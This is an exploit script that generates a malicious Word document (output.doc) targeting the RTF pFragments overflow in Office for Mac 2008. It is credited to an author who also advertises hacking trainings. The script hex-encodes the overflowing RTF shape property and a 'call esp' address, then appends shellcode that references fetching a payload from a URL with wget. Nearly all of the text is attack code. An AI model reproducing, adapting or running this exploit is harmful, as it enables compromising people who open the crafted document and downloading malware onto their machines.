#RTF Pfragments exploit for MAC office 2008
#Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
#Advanced Hacking Trainings - http://training.aslitsecurity.com
#Web - http://www.aslitsecurity.com/
#Blog - http://www.aslitsecurity.blogspot.com/
#Office 2007 for MC SP 0
#!/usr/bin/python

myfile = (
"\x7b\x5c\x72\x74\x66\x31\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7b"
"\x5c\x73\x6e\x20\x70\x46\x72\x61\x67\x6d\x65\x6e\x74\x73\x7d\x7b"
"\x5c\x73\x76\x20\x39\x3b\x32\x3b\x31\x31\x31\x31\x31\x31\x31\x31"
"\x37\x35\x30\x30\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"f069837c"  # call esp
"\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31"
"\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31"
"\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x62\x61\x30\x30"
"\x30\x30\x35\x30\x30\x30\x36\x36\x38\x31\x63\x61\x66\x66\x30\x66"
"\x34\x32\x35\x32\x36\x61\x30\x32\x35\x38\x63\x64\x32\x65\x33\x63"
"\x30\x35\x35\x61\x37\x34\x65\x66\x62\x38\x37\x30\x36\x39\x36\x65"
"\x36\x37\x38\x62\x66\x61\x61\x66\x37\x35\x65\x61\x61\x66\x37\x35"
"\x65\x37\x35\x37\x63\x33\x7d\x7d\x7d\x7d"
)

sign = (
"\x70\x69\x6e\x67\x70\x69\x6e\x67"
)

shellcode = "\xCC\xCC\xCC\xCC"
shellcode += "http://www.site.com/payload.DMG"
shellcode += "\x11\x3A\x65\x89\x11\x3A\x65\x89\x11\x3A\x65\x89" #("wget http://")
shellcode += "wget "
shellcode += "\x1A\x18\x19\x02"

exploit = open("output.doc", mode="wb")
exploit.write(myfile + sign + shellcode)
print "Done"